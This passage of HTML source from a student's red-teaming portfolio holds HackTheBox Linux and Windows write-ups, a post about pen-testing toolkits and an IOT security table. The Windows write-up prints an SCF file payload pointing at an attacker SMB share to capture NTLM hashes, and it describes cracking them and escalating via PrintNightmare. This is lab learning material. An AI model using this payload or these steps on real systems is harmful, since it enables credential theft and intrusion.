                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
          user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
